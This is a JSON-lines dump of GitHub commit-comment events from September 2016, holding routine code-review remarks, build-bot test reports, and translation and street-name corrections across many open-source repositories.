{"id":"4556438273","type":"CommitCommentEvent","actor":{"login":"hbrunn"},"repo":{"name":"OCA/OCB"},"payload":{"comment":{"id":19003790,"position":null,"line":null,"path":null,"commit_id":"a7dc3e17066274763d890d2b19bfa823091fdc0c","created_at":"2016-09-13T15:41:45Z","updated_at":"2016-09-13T15:41:45Z","body":"so let's go ahead https://github.com/OCA/OCB/pull/542"}},"created_at":"2016-09-13T15:41:45Z"}
{"id":"4556440481","type":"CommitCommentEvent","actor":{"login":"SofiaMargariti"},"repo":{"name":"transifex/transifex-sync-zendesk"},"payload":{"comment":{"id":19003792,"position":8,"line":16,"path":"src/lib/transifex-api/project.js","commit_id":"93a36d4771f131dadcf982ead7847b5e6ba9ab68","created_at":"2016-09-13T15:42:06Z","updated_at":"2016-09-13T15:42:06Z","body":"@nbasili I don't think that we should be changing this version. This is the version of the zendesk framework we are using. We are not gonna move to 2.0 just yet."}},"created_at":"2016-09-13T15:42:06Z"}
{"id":"4556445888","type":"CommitCommentEvent","actor":{"login":"alexanderlerch"},"repo":{"name":"GTCMT/FBA2013"},"payload":{"comment":{"id":19003799,"position":null,"line":null,"path":null,"commit_id":"bf673a28fc0a1f1825a373aea4fa2a26033cc2a7","created_at":"2016-09-13T15:42:55Z","updated_at":"2016-09-13T15:42:55Z","body":"could we have some more detailed commit messages? I also wouldn't commit any temporary changes."}},"created_at":"2016-09-13T15:42:55Z"}
{"id":"4556452795","type":"CommitCommentEvent","actor":{"login":"dstftw"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":19003811,"position":null,"line":null,"path":null,"commit_id":"7a7309219cae70e14f58e904591a77360bfbc985","created_at":"2016-09-13T15:43:58Z","updated_at":"2016-09-13T15:43:58Z","body":"Could you also provide a log with `--no-cache-dir` and `--write-pages` or `--dump-pages` of the complete process from authentication till the moment download starts for analyzing (I don't have CATV)?"}},"created_at":"2016-09-13T15:43:58Z"}
{"id":"4556455538","type":"CommitCommentEvent","actor":{"login":"pjmorse"},"repo":{"name":"dmcouncil/ember-bootstrap-time-input-group"},"payload":{"comment":{"id":19003819,"position":null,"line":null,"path":null,"commit_id":"fa431eeb8d6f2ccc0b81a1375b290980aadf850c","created_at":"2016-09-13T15:44:25Z","updated_at":"2016-09-13T15:44:25Z","body":"I think it's the \"repository\" attribute in `package.json`. See the [`ember-cli-form-errors` package file](https://github.com/dmcouncil/ember-cli-form-errors/blob/master/package.json) for example."}},"created_at":"2016-09-13T15:44:25Z"}
{"id":"4556458255","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19003828,"position":null,"line":null,"path":null,"commit_id":"8c8f90c5689ada937dbb1846791727a705752d3d","created_at":"2016-09-13T15:44:48Z","updated_at":"2016-09-13T15:44:48Z","body":"ASIHPValidation (shenb) - x86_64-MacOS-10.9-clang: OK (2318 of 2326 tests passed, 24 test warnings)\n\n * 11 tests had: EIO diffs.\n * 7 tests had: ESO big diffs.\n * 8 tests had: Table big diffs.\n * 3 tests had: MTR big diffs.\n * 16 tests had: ESO small diffs.\n * 25 tests had: AUD diffs.\n * 25 tests had: RDD diffs.\n * 13 tests had: MTR small diffs.\n * 1 test had: Table small diffs.\n * 1 test had: ERR diffs.\n * 1 test had: MTD diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8c8f90c5689ada937dbb1846791727a705752d3d-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8c8f90c5689ada937dbb1846791727a705752d3d-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.66%25-yellow.svg)</a> \n"}},"created_at":"2016-09-13T15:44:48Z"}
{"id":"4556458531","type":"CommitCommentEvent","actor":{"login":"peterkohaut"},"repo":{"name":"peterkohaut/scummvm"},"payload":{"comment":{"id":19003829,"position":null,"line":null,"path":null,"commit_id":"a51691ce37664fd8300a60206b5e7bd2b98e27f7","created_at":"2016-09-13T15:44:51Z","updated_at":"2016-09-13T15:44:51Z","body":"uf, it is still far far away to be playable....\r\n\r\nwhat is needed to merge it to main tree?\r\n\r\nmadmoose, thanks, but your part was much harder to figure out, so.. respect man :)\r\n"}},"created_at":"2016-09-13T15:44:51Z"}
{"id":"4556468583","type":"CommitCommentEvent","actor":{"login":"RiseT"},"repo":{"name":"WhisperSystems/Signal-iOS"},"payload":{"comment":{"id":19003861,"position":null,"line":null,"path":null,"commit_id":"c0d631db4718acb57f96e003f77362cd95759eed","created_at":"2016-09-13T15:46:24Z","updated_at":"2016-09-13T15:46:24Z","body":"Please update translations another time prior to the actual release. I've completed the German translation today (and the user base for Signal in Germany is rather large)."}},"created_at":"2016-09-13T15:46:24Z"}
{"id":"4556468715","type":"CommitCommentEvent","actor":{"login":"decvalts"},"repo":{"name":"LSDtopotools/LSDTT_vagrantfiles"},"payload":{"comment":{"id":19003862,"position":null,"line":null,"path":null,"commit_id":"fac472a6fee07cab7a81fc19c2177171af4a8511","created_at":"2016-09-13T15:46:25Z","updated_at":"2016-09-13T15:46:25Z","body":"I don't think the 64 bit versions will work on _any_ OS unless you have turned on the required setting in BIOS. (I had to turn it on in Linux. Haven't tested this on a Mac, but I think it's more a hardware than software issue...)"}},"created_at":"2016-09-13T15:46:25Z"}
{"id":"4556476346","type":"CommitCommentEvent","actor":{"login":"eatyourgreens"},"repo":{"name":"alexbfree/Panoptes-Front-End"},"payload":{"comment":{"id":19003882,"position":null,"line":null,"path":null,"commit_id":"bbf141bbf04d51033351f994546e59132112e1a9","created_at":"2016-09-13T15:47:31Z","updated_at":"2016-09-13T15:47:31Z","body":"By the way, these links will reload the page, resetting the JavaScript. Internal links should use `Link`. See #2976. "}},"created_at":"2016-09-13T15:47:31Z"}
{"id":"4556478036","type":"CommitCommentEvent","actor":{"login":"astitva1995"},"repo":{"name":"astitva1995/Draftify"},"payload":{"comment":{"id":19003886,"position":null,"line":null,"path":null,"commit_id":"720cbbfb1b246ea4499067a7096b1e3ed0b4ba1f","created_at":"2016-09-13T15:47:46Z","updated_at":"2016-09-13T15:47:46Z","body":"@dollysree @suhaivms In this commit, only display layout has been changed, but the code has not been formatted. In the code there are following formatting related problems:\r\n\r\n- Indentation problems in elements wrt. parent-child relationship.\r\n- So many extra blank lines are there after few elements or some text.\r\n- No comment has been added. You could add comment about different tabs e.g. For SAC INFO tab, add comment like this  \r\n`<!--SAC-INFO TAB. It shows elected members of sac under different positions-->`  \r\n`  ..............Tab CODE.....................`  \r\n`   <!--END SAC-INFO TAB-->`\r\n- The classes and ids used in the accordion based panels' code for club societies are not semantic. e.g.    \r\n`<div class=\"panel panel-default\">`  \r\n  `<div class=\"panel-heading\"> <a data-toggle=\"collapse\" data-parent=\"#accordion\" href=\"#collapseTwo\" class=\"collapsed\">`    \r\n\t\t\t\t\t\t\t\t\t\t\t        `<div class=\"nav-icon\"> <i class=\"fa fa-plus-square\"></i> <i class=\"fa fa-minus-square\"></i> </div>`  \r\n\t\t\t\t\t\t\t\t\t\t\t        `<h1>Director’s Nominee</h1>`  \r\n\t\t\t\t\t\t\t\t\t\t\t    `  </a> </div>`  \r\n\t\t\t\t\t\t\t\t\t\t\t     ` <div id=\"collapseTwo\" class=\"panel-collapse collapse\">`  \r\nHere, the id name of the panel is 'collapseTwo', that doesn't convey the true meaning of this panel, so you can replace all of its instances with 'panel-director-nominees'. Similarly you can see the class names and modify them accordingly. But, if after changing the class name or id name, some styles are removed from the elements (check the layout and its style in the browser after doing each replace or modify operation), then undo the change."}},"created_at":"2016-09-13T15:47:46Z"}
{"id":"4556478113","type":"CommitCommentEvent","actor":{"login":"computadorassoluciones"},"repo":{"name":"computadorassoluciones/hello_word"},"payload":{"comment":{"id":19003887,"position":1,"line":1,"path":"README.md","commit_id":"ed0642b6aea141faaf5a9dec16f64c6c10e6795d","created_at":"2016-09-13T15:47:46Z","updated_at":"2016-09-13T15:47:46Z","body":"mkdir prueba"}},"created_at":"2016-09-13T15:47:46Z"}
{"id":"4556479121","type":"CommitCommentEvent","actor":{"login":"WinXaito"},"repo":{"name":"firm1/zest-writer"},"payload":{"comment":{"id":19003891,"position":4,"line":270,"path":"src/main/resources/locales/ui_fr_FR.properties","commit_id":"4d97d7e37c1793a6f8d7b8ef4b3a38c8949d2f13","created_at":"2016-09-13T15:47:55Z","updated_at":"2016-09-13T15:47:55Z","body":"Zup"}},"created_at":"2016-09-13T15:47:55Z"}
{"id":"4556480966","type":"CommitCommentEvent","actor":{"login":"alisonmonteiro"},"repo":{"name":"pipocadigital/grao-de-milho"},"payload":{"comment":{"id":19003895,"position":null,"line":null,"path":null,"commit_id":"7a944184c83dde3e8e801ef92d700607db9255ff","created_at":"2016-09-13T15:48:13Z","updated_at":"2016-09-13T15:48:13Z","body":"*task"}},"created_at":"2016-09-13T15:48:13Z"}
{"id":"4556482256","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19003899,"position":null,"line":null,"path":null,"commit_id":"8c8f90c5689ada937dbb1846791727a705752d3d","created_at":"2016-09-13T15:48:24Z","updated_at":"2016-09-13T15:48:24Z","body":"ASIHPValidation (shenb) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1186 of 1186 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8c8f90c5689ada937dbb1846791727a705752d3d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8c8f90c5689ada937dbb1846791727a705752d3d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8c8f90c5689ada937dbb1846791727a705752d3d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-35.98%25-green.svg)</a>\n"}},"created_at":"2016-09-13T15:48:24Z"}
{"id":"4556482499","type":"CommitCommentEvent","actor":{"login":"andrerom"},"repo":{"name":"ezsystems/ezstudio-demo"},"payload":{"comment":{"id":19003900,"position":4,"line":8,"path":"app/config/env/docker.php","commit_id":"3290ef15c5d10df816e1ce51b607ab332c3ec4ad","created_at":"2016-09-13T15:48:27Z","updated_at":"2016-09-13T15:48:27Z","body":"Well `MYSQL_HOST` is not used by this file, so in this file, as is, this  makes sense.\r\nIf you can forward me the env.php file or similar used on SDC that would help for me to understand your issue."}},"created_at":"2016-09-13T15:48:27Z"}
{"id":"4556484119","type":"CommitCommentEvent","actor":{"login":"Elmo337"},"repo":{"name":"mangoszero/server"},"payload":{"comment":{"id":19003905,"position":null,"line":null,"path":null,"commit_id":"cdd3489f08028e48fad6dfaf1254f441855610ee","created_at":"2016-09-13T15:48:40Z","updated_at":"2016-09-13T15:48:40Z","body":"Ive got alot of Errors by compiling it on my Linux Server\r\n\r\n`Object.cpp:1541:11:`\r\n`ScriptMgr.cpp:1394:350`\r\n`Object.cpp:1570:25:`\r\n\r\nand so on"}},"created_at":"2016-09-13T15:48:40Z"}
{"id":"4556484794","type":"CommitCommentEvent","actor":{"login":"DenisCarriere"},"repo":{"name":"osmottawa/imports"},"payload":{"comment":{"id":19003909,"position":107,"line":335,"path":"CECCE/schools.geojson","commit_id":"01a7e28c28865781af33b8a413c241244ead261c","created_at":"2016-09-13T15:48:46Z","updated_at":"2016-09-13T15:48:46Z","body":"@james2432 \r\n![image](https://cloud.githubusercontent.com/assets/550895/18480777/f366f0d8-79a7-11e6-8dd9-95acd5a2e09a.png)\r\n\r\nrue / street"}},"created_at":"2016-09-13T15:48:46Z"}
{"id":"4556491648","type":"CommitCommentEvent","actor":{"login":"Maigre"},"repo":{"name":"vberthiaume/HPlayer"},"payload":{"comment":{"id":19003921,"position":null,"line":null,"path":null,"commit_id":"7c92cda10413b951794d95208d420c4379698785","created_at":"2016-09-13T15:49:48Z","updated_at":"2016-09-13T15:49:48Z","body":"so i found it but i sadly did not compile it with static lib so it still require the custom recompiled version of libvlc which i do not have here. I'll try to recompile it properly and send it to you but it will take some time (libvlc compiling takes couple hours...) i'll let you know if i end up with something usable."}},"created_at":"2016-09-13T15:49:48Z"}
{"id":"4556493391","type":"CommitCommentEvent","actor":{"login":"dstftw"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":19003923,"position":6,"line":95,"path":"youtube_dl/extractor/adobepass.py","commit_id":"7e60ce9cf7b104c15fcc4c495166dc57b950b987","created_at":"2016-09-13T15:50:01Z","updated_at":"2016-09-13T15:50:01Z","body":"I guess it may be more terse to wrap the main auth code in `while True` and just evaluate `continue` here instead of recursive call to `_extract_mvpd_auth`. I also think it's good to place some watchdog in auth code in case several subsequent tries fail with `pendingLogout` in order not to stuck trying forever."}},"created_at":"2016-09-13T15:50:01Z"}
{"id":"4556493978","type":"CommitCommentEvent","actor":{"login":"michaelkirk"},"repo":{"name":"WhisperSystems/Signal-iOS"},"payload":{"comment":{"id":19003927,"position":null,"line":null,"path":null,"commit_id":"c0d631db4718acb57f96e003f77362cd95759eed","created_at":"2016-09-13T15:50:08Z","updated_at":"2016-09-13T15:50:08Z","body":"I juuuuuuuust pulled them and noticed your work, danke!\r\n\r\nYour translations should be rebased into this commit.\r\n\r\ne.g. \r\n\r\n```\r\n /* Button text */\r\n-\"CONFIRM_LINK_NEW_DEVICE_ACTION\" = \"Link New Device\";\r\n+\"CONFIRM_LINK_NEW_DEVICE_ACTION\" = \"Neues Gerät verknüpfen\";\r\n /* Alert title */\r\n-\"LINKING_DEVICE_FAILED_TITLE\" = \"Linking Device Failed\";\r\n+\"LINKING_DEVICE_FAILED_TITLE\" = \"Verknüpfen des Geräts gescheitert\";\r\n /* Activity indicator title, shown upon returning to the device manager, until you complete the provisioning process on desktop */\r\n-WAITING_TO_COMPLETE_DEVICE_LINK_TEXT=\"Complete setup on Signal Desktop.\";\r\n+WAITING_TO_COMPLETE_DEVICE_LINK_TEXT=\"Schließen Sie die Einrichtung von Signal Desktop ab.\";\r\n```"}},"created_at":"2016-09-13T15:50:08Z"}
{"id":"4556495890","type":"CommitCommentEvent","actor":{"login":"nikkolasg"},"repo":{"name":"dedis/cothority"},"payload":{"comment":{"id":19003934,"position":58,"line":103,"path":"services/swupdate/simulation_flood.go","commit_id":"82fa685c86bc42859cd23a85f00ed683c27bece9","created_at":"2016-09-13T15:50:24Z","updated_at":"2016-09-13T15:50:24Z","body":"can you make that (`time.Hour`) a variable ? Maybe we want to play with it during sim & it could come from the simulation file."}},"created_at":"2016-09-13T15:50:24Z"}
{"id":"4556496208","type":"CommitCommentEvent","actor":{"login":"DenisCarriere"},"repo":{"name":"osmottawa/imports"},"payload":{"comment":{"id":19003936,"position":127,"line":387,"path":"CECCE/schools.geojson","commit_id":"01a7e28c28865781af33b8a413c241244ead261c","created_at":"2016-09-13T15:50:27Z","updated_at":"2016-09-13T15:50:27Z","body":"@james2432 \r\n![image](https://cloud.githubusercontent.com/assets/550895/18480862/3bc11642-79a8-11e6-82f3-74d9ca1a5c41.png)\r\nstreet"}},"created_at":"2016-09-13T15:50:27Z"}
{"id":"4556498255","type":"CommitCommentEvent","actor":{"login":"vberthiaume"},"repo":{"name":"vberthiaume/HPlayer"},"payload":{"comment":{"id":19003942,"position":null,"line":null,"path":null,"commit_id":"7c92cda10413b951794d95208d420c4379698785","created_at":"2016-09-13T15:50:44Z","updated_at":"2016-09-13T15:50:44Z","body":"sounds good, thank you so much!\n\nOn Tue, Sep 13, 2016 at 11:49 AM, Maigre <notifications@github.com> wrote:\n\n> so i found it but i sadly did not compile it with static lib so it still\n> require the custom recompiled version of libvlc which i do not have here.\n> I'll try to recompile it properly and send it to you but it will take some\n> time (libvlc compiling takes couple hours...) i'll let you know if i end up\n> with something usable.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/vberthiaume/HPlayer/commit/7c92cda10413b951794d95208d420c4379698785#commitcomment-19003921>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ADjIMdmpSrKSn2-TLFn1nDMc2B4Luq48ks5qpsYcgaJpZM4J7ww8>\n> .\n>\n"}},"created_at":"2016-09-13T15:50:44Z"}
{"id":"4556505415","type":"CommitCommentEvent","actor":{"login":"DenisCarriere"},"repo":{"name":"osmottawa/imports"},"payload":{"comment":{"id":19003956,"position":161,"line":491,"path":"CECCE/schools.geojson","commit_id":"01a7e28c28865781af33b8a413c241244ead261c","created_at":"2016-09-13T15:51:46Z","updated_at":"2016-09-13T15:51:46Z","body":"@james2432 \r\n![image](https://cloud.githubusercontent.com/assets/550895/18480923/6c56d0da-79a8-11e6-9163-0524d8248593.png)\r\n\r\nstreet"}},"created_at":"2016-09-13T15:51:46Z"}
{"id":"4556507566","type":"CommitCommentEvent","actor":{"login":"neikeq"},"repo":{"name":"godotengine/godot"},"payload":{"comment":{"id":19003960,"position":null,"line":null,"path":null,"commit_id":"f10d2bd3944f3a520cf9f131b801f403c834ea6e","created_at":"2016-09-13T15:52:06Z","updated_at":"2016-09-13T15:52:06Z","body":"That's weird. <kbd>Shift</kbd>+<kbd>F11</kbd>  doesn't toggle full screen for me. It just hides everything except the central dock (with scenes tabs hidden)."}},"created_at":"2016-09-13T15:52:06Z"}
{"id":"4556509696","type":"CommitCommentEvent","actor":{"login":"jeichorn"},"repo":{"name":"jeichorn/mysqldump-php"},"payload":{"comment":{"id":19003966,"position":null,"line":null,"path":null,"commit_id":"a80c0427cbbd61b92cf9ad3b0250a1059a1c3b33","created_at":"2016-09-13T15:52:26Z","updated_at":"2016-09-13T15:52:26Z","body":"So the biggest thing is just to make sure you are only hitting the information schema once.  Mysqldump for example run show tables like on every table you dump so on a setup with a couple 100k tables you will be about 10x slower then just running it once.\r\n\r\nAs far as as the stats on metadata portion goes, you are likely better to just make sure its disabled.  It is off by default in 5.7, but i've seen it on by default in the past.\r\n\r\n"}},"created_at":"2016-09-13T15:52:26Z"}
{"id":"4556517735","type":"CommitCommentEvent","actor":{"login":"decvalts"},"repo":{"name":"LSDtopotools/LSDTT_vagrantfiles"},"payload":{"comment":{"id":19003981,"position":7,"line":34,"path":"readme.asc","commit_id":"fac472a6fee07cab7a81fc19c2177171af4a8511","created_at":"2016-09-13T15:53:39Z","updated_at":"2016-09-13T15:53:39Z","body":"@simon-m-mudd I don't think the 64 bit versions will work on any OS unless you have turned on the required setting in BIOS. (I had to turn it on using Linux. Haven't tried it on a Mac...)\r\n\r\n"}},"created_at":"2016-09-13T15:53:39Z"}
{"id":"4556518886","type":"CommitCommentEvent","actor":{"login":"james2432"},"repo":{"name":"osmottawa/imports"},"payload":{"comment":{"id":19003984,"position":null,"line":null,"path":null,"commit_id":"01a7e28c28865781af33b8a413c241244ead261c","created_at":"2016-09-13T15:53:49Z","updated_at":"2016-09-13T15:53:49Z","body":"Rue = Street\r\nRoad = Chemin  (might have been the datasource it said Chemin Carrière)"}},"created_at":"2016-09-13T15:53:49Z"}
{"id":"4556519396","type":"CommitCommentEvent","actor":{"login":"jeichorn"},"repo":{"name":"jeichorn/mysqldump-php"},"payload":{"comment":{"id":19003986,"position":null,"line":null,"path":null,"commit_id":"a80c0427cbbd61b92cf9ad3b0250a1059a1c3b33","created_at":"2016-09-13T15:53:54Z","updated_at":"2016-09-13T15:53:54Z","body":"The bigger benefit in my use case is https://github.com/jeichorn/mysqldump-php/commit/1e2888c79cad9e9a38665fbc080f85c8b85ebacb\r\n\r\nSince it allows me to show tables externally chunk them and then dump in parallel.  Which is way outside of the normal mysql use case, but pretty handy when you need to dump data from 500k tables."}},"created_at":"2016-09-13T15:53:54Z"}
{"id":"4556520313","type":"CommitCommentEvent","actor":{"login":"sev-"},"repo":{"name":"peterkohaut/scummvm"},"payload":{"comment":{"id":19003989,"position":null,"line":null,"path":null,"commit_id":"a51691ce37664fd8300a60206b5e7bd2b98e27f7","created_at":"2016-09-13T15:54:03Z","updated_at":"2016-09-13T15:54:03Z","body":"The requirements for the inclusion are that the code is clean, always compiles and is in active development. That is, if the engine is not progressing from more than 6 months, it could be removed from the tree.\r\n\r\nThese days we prefer that more ScummVM development is performed in-tree, with early benefits of buldbot, and many developers seeing your code. Of course, there are also other benefits of being a ScummVM Team member in general, they're enlisted on our Developer Central: http://wiki.scummvm.org/index.php/Developer_Central#Team_Member_Benefits"}},"created_at":"2016-09-13T15:54:03Z"}
{"id":"4556525543","type":"CommitCommentEvent","actor":{"login":"pasniak"},"repo":{"name":"apps4av/avare"},"payload":{"comment":{"id":19004003,"position":18,"line":0,"path":"app/src/main/java/com/ds/avare/place/Airway.java","commit_id":"4d5a3d66c3e6dc8debbc9d9d5206f0654cd7085f","created_at":"2016-09-13T15:54:49Z","updated_at":"2016-09-13T15:54:49Z","body":"this is copy-paste, possibly avoidable by use of an iterator?"}},"created_at":"2016-09-13T15:54:49Z"}
{"id":"4556525587","type":"CommitCommentEvent","actor":{"login":"sunnybear"},"repo":{"name":"pagespeed/ngx_pagespeed"},"payload":{"comment":{"id":19004004,"position":null,"line":null,"path":null,"commit_id":"8bf48ac77d7ba92487ce57a54e1c82bd36168a50","created_at":"2016-09-13T15:54:50Z","updated_at":"2016-09-13T15:54:50Z","body":"This breaks configuration at all :("}},"created_at":"2016-09-13T15:54:50Z"}
{"id":"4556528586","type":"CommitCommentEvent","actor":{"login":"ToddSmithSalter"},"repo":{"name":"nickschot/ember-ui-sortable"},"payload":{"comment":{"id":19004011,"position":null,"line":null,"path":null,"commit_id":"51ec1ef0e6d6095ed715bf80da60814ec870ff8c","created_at":"2016-09-13T15:55:18Z","updated_at":"2016-09-13T15:55:18Z","body":"@nickschot I'm certainly in favour removing any mutation of the content array. This should be handled in the route/controller/parent component as per DDAU."}},"created_at":"2016-09-13T15:55:18Z"}
{"id":"4556534737","type":"CommitCommentEvent","actor":{"login":"arokem"},"repo":{"name":"nipy/dipy"},"payload":{"comment":{"id":19004027,"position":13,"line":300,"path":"dipy/reconst/tests/test_ivim.py","commit_id":"f0c8420e89e961f1acf92b96e9d26e0f6d38c340","created_at":"2016-09-13T15:56:15Z","updated_at":"2016-09-13T15:56:15Z","body":"Should this be smaller than *0.17*? "}},"created_at":"2016-09-13T15:56:15Z"}
{"id":"4556534901","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":19004029,"position":null,"line":null,"path":null,"commit_id":"2720afcceb650dda5fcf9e6b46bd0be74ffeb278","created_at":"2016-09-13T15:56:16Z","updated_at":"2016-09-13T15:56:16Z","body":"The following doc(s) have been deployed to the [1863migrat](https://1863migrat-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/migrate](https://1863migrat-static-docs.pantheonsite.io/docs/migrate)\n- [docs/migrate-manual](https://1863migrat-static-docs.pantheonsite.io/docs/migrate-manual)\n"}},"created_at":"2016-09-13T15:56:16Z"}
{"id":"4556537915","type":"CommitCommentEvent","actor":{"login":"chrberger"},"repo":{"name":"chalmers-revere/opendlv.core"},"payload":{"comment":{"id":19004033,"position":35,"line":67,"path":"code/core/system/proxy-camera/src/ProxyCamera.cpp","commit_id":"19ac391b09de25aedf1fcaf077a76815d5a301f9","created_at":"2016-09-13T15:56:42Z","updated_at":"2016-09-13T15:56:42Z","body":"This line is not sufficient as the getYYYY... call returns a string with a blank. Please have a look at the other source that I showed you in proxy-fh16."}},"created_at":"2016-09-13T15:56:42Z"}
{"id":"4556540830","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":19004046,"position":null,"line":null,"path":null,"commit_id":"dd6ea8aa906031d09e792c78650f785dccaae62d","created_at":"2016-09-13T15:57:09Z","updated_at":"2016-09-13T15:57:09Z","body":"The following doc(s) have been deployed to the [1863migrat](https://1863migrat-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/migrate](https://1863migrat-static-docs.pantheonsite.io/docs/migrate)\n- [docs/migrate-manual](https://1863migrat-static-docs.pantheonsite.io/docs/migrate-manual)\n- [docs/migrate-wordpress](https://1863migrat-static-docs.pantheonsite.io/docs/migrate-wordpress)\n"}},"created_at":"2016-09-13T15:57:09Z"}
{"id":"4556542794","type":"CommitCommentEvent","actor":{"login":"JoshOlds"},"repo":{"name":"JoshOlds/day-2"},"payload":{"comment":{"id":19004053,"position":4,"line":9,"path":"index.html","commit_id":"c156d3493d07c539b8fd792624d81de5696abfe5","created_at":"2016-09-13T15:57:25Z","updated_at":"2016-09-13T15:57:25Z","body":"Test Comment!"}},"created_at":"2016-09-13T15:57:25Z"}
{"id":"4556551331","type":"CommitCommentEvent","actor":{"login":"DenisCarriere"},"repo":{"name":"osmottawa/imports"},"payload":{"comment":{"id":19004079,"position":255,"line":751,"path":"CECCE/schools.geojson","commit_id":"01a7e28c28865781af33b8a413c241244ead261c","created_at":"2016-09-13T15:58:43Z","updated_at":"2016-09-13T15:58:43Z","body":"@james2432 Sharpe's Lane - Not Way"}},"created_at":"2016-09-13T15:58:43Z"}
{"id":"4556555537","type":"CommitCommentEvent","actor":{"login":"james2432"},"repo":{"name":"osmottawa/imports"},"payload":{"comment":{"id":19004087,"position":161,"line":491,"path":"CECCE/schools.geojson","commit_id":"01a7e28c28865781af33b8a413c241244ead261c","created_at":"2016-09-13T15:59:22Z","updated_at":"2016-09-13T15:59:22Z","body":"What's the problem here? I corrected it to Street from your road"}},"created_at":"2016-09-13T15:59:22Z"}
{"id":"4556556553","type":"CommitCommentEvent","actor":{"login":"rps333"},"repo":{"name":"osmottawa/imports"},"payload":{"comment":{"id":19004092,"position":107,"line":335,"path":"CECCE/schools.geojson","commit_id":"01a7e28c28865781af33b8a413c241244ead261c","created_at":"2016-09-13T15:59:31Z","updated_at":"2016-09-13T15:59:31Z","body":"looks like a dodgy area\n\nOn Tue, Sep 13, 2016 at 11:48 AM, Denis <notifications@github.com> wrote:\n\n> @james2432 <https://github.com/james2432>\n> [image: image]\n> <https://cloud.githubusercontent.com/assets/550895/18480777/f366f0d8-79a7-11e6-8dd9-95acd5a2e09a.png>\n>\n> rue / street\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/osmottawa/imports/commit/01a7e28c28865781af33b8a413c241244ead261c#commitcomment-19003909>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AHhvztZKfb7dqFTXXIfMhU4CT8Pm-17pks5qpsXfgaJpZM4J71R4>\n> .\n>\n"}},"created_at":"2016-09-13T15:59:31Z"}
{"id":"4556557448","type":"CommitCommentEvent","actor":{"login":"mathiasvr"},"repo":{"name":"feross/webtorrent-desktop"},"payload":{"comment":{"id":19004093,"position":38,"line":51,"path":"src/main/external-player.js","commit_id":"3a4906079bed4050396d78982963128ca511d1f3","created_at":"2016-09-13T15:59:40Z","updated_at":"2016-09-13T15:59:40Z","body":"Yes that would probably be safer, but I don't think any Windows/Linux users will select a file with the `.app` extension."}},"created_at":"2016-09-13T15:59:40Z"}
{"id":"4556557933","type":"CommitCommentEvent","actor":{"login":"sunnybear"},"repo":{"name":"pagespeed/ngx_pagespeed"},"payload":{"comment":{"id":19004096,"position":null,"line":null,"path":null,"commit_id":"8bf48ac77d7ba92487ce57a54e1c82bd36168a50","created_at":"2016-09-13T15:59:44Z","updated_at":"2016-09-13T15:59:44Z","body":"$mod_pagespeed_dir/third_party/protobuf/src/src -> $mod_pagespeed_dir/third_party/protobuf/src"}},"created_at":"2016-09-13T15:59:44Z"}
{"id":"4556560620","type":"CommitCommentEvent","actor":{"login":"6eff"},"repo":{"name":"SocialList/devine"},"payload":{"comment":{"id":19004097,"position":null,"line":null,"path":null,"commit_id":"952b24336a5a5036b618cd680cfe3126d8518bbb","created_at":"2016-09-13T16:00:11Z","updated_at":"2016-09-13T16:00:11Z","body":"Closes #13 too"}},"created_at":"2016-09-13T16:00:11Z"}
{"id":"4556560928","type":"CommitCommentEvent","actor":{"login":"DenisCarriere"},"repo":{"name":"osmottawa/imports"},"payload":{"comment":{"id":19004099,"position":291,"line":855,"path":"CECCE/schools.geojson","commit_id":"01a7e28c28865781af33b8a413c241244ead261c","created_at":"2016-09-13T16:00:14Z","updated_at":"2016-09-13T16:00:14Z","body":"![image](https://cloud.githubusercontent.com/assets/550895/18481254/92ed149c-79a9-11e6-9784-795cd9d969d4.png)\r\n\r\nThis one is good 👍 "}},"created_at":"2016-09-13T16:00:14Z"}
{"id":"4556566033","type":"CommitCommentEvent","actor":{"login":"adamgoose"},"repo":{"name":"dlord/minecraft-docker"},"payload":{"comment":{"id":19004105,"position":null,"line":null,"path":null,"commit_id":"5412b70aa06d43ba60927980714b84f2e2b166b1","created_at":"2016-09-13T16:00:55Z","updated_at":"2016-09-13T16:00:55Z","body":"👍 "}},"created_at":"2016-09-13T16:00:55Z"}
